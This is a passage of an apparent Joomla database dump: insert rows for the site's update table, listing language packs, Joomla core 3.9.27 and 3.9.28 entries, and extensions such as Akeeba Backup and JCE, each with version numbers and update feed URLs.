Unitag','','pkg_ar-AA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(29123,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(29124,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(29125,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(29126,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(29127,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(29128,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(29129,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(29130,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(29131,3,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(29132,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(29133,3,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(29134,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(29135,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(29136,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(29137,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(29138,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(29139,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(29140,3,0,'English US','','pkg_en-US','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(29141,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(29142,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(29143,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(29144,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(29145,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(29146,3,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(29147,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(29148,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(29149,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(29150,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(29151,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(29152,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(29153,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(29154,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(29155,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(29156,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.27.2','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(29157,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(29158,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(29159,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(29160,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(29161,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(29162,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(29163,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(29164,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(29165,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(29166,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(29167,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(29168,57,0,'French','','pkg_fr-FR','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(29169,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(29170,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(29171,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(29172,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(29173,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(29174,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(29175,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(29176,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(29177,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(29178,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(29179,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(29180,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(29181,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(29182,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(29183,57,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(29184,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(29185,57,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(29186,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(29187,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(29188,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(29189,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(29190,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(29191,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(29192,57,0,'English US','','pkg_en-US','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(29193,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(29194,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(29195,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(29196,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(29197,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(29198,57,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(29199,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(29200,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(29201,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(29202,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(29203,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(29204,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(29205,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(29206,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(29207,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(29208,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.27.2','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(29209,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(29210,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(29211,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(29212,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(29213,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(29214,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(29215,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(29216,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(29217,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(29218,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-6.html',''),(29219,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.3FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer/features',''),(29220,122,0,'Google Structured Data Free','Google Structured Data Free','gsd','plugin','system',0,'4.8.7','','https://static.tassos.gr/update/gsdfree?type=.xml','\n			https://www.tassos.gr/releases/google-structured-data-markup/google-structured-data-markup-4-8-7			\n		',''),(29221,129,0,'JCE 2.9.9','Installation package for Joomla! 3.x and 4.x','pkg_jce','package','',0,'2.9.9','','https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml','https://www.joomlacontenteditor.net/news/jce-pro-2-9-9-released',''),(29222,135,0,' Phoca Gallery ',' Phoca Gallery is an efficient image gallery extension for Joomla! CMS. ','com_phocagallery','component','',1,'4.4.3','','https://raw.githubusercontent.com/PhocaCz/PhocaGallery/master/manifest.xml','http://www.phoca.cz/version/index.php?phocagallery=4.4.3',''),(29223,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29224,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29225,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29226,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29227,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-6.html',''),(29228,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29229,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29230,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29231,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29232,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-6.html',''),(29233,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29234,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29235,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29236,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-6.html',''),(29237,1,0,'Joomla','','joomla','file','',0,'3.9.27','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29238,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29239,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29240,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-6.html',''),(29241,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29242,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29243,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29244,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29245,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29246,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29247,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.6','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-6.html',''),(29248,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(29249,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(29250,3,0,'French','','pkg_fr-FR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(29251,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(29252,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(29253,1,0,'Joomla','','joomla','file','',0,'3.9.28','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(29254,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(29255,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(29256,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(29257,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(29258,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(29259,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(29260,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.28.2','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(29261,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(29262,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(29263,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(29264,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(29265,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(29266,3,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(29267,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(29268,3,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(29269,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(29270,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(29271,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(29272,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(29273,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(29274,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(29275,3,0,'English US','','pkg_en-US','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(29276,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(29277,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(29278,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(29279,3,0,'Turkish','','pkg_tr-TR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/tr-TR_details.xml','',''),(29280,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(29281,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(29282,3,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(29283,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(29284,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(29285,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(29286,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(29287,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(29288,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(29289,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(29290,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(29291,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(29292,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(29293,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(29294,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(29295,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(29296,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(29297,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(29298,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(29299,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(29300,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(29301,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(29302,57,0,'French','','pkg_fr-FR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(29303,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(29304,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(29305,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(29306,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(29307,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(29308,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(29309,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(29310,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(29311,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.28.2','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(29312,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(29313,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(29314,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(29315,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(29316,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(29317,57,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(29318,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(29319,57,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(29320,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(29321,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(29322,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(29323,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(29324,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(29325,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(29326,57,0,'English US','','pkg_en-US','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(29327,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(29328,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(29329,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(29330,57,0,'Turkish','','pkg_tr-TR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/tr-TR_details.xml','',''),(29331,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(29332,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(29333,57,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(29334,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(29335,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(29336,57,0,'Serbian 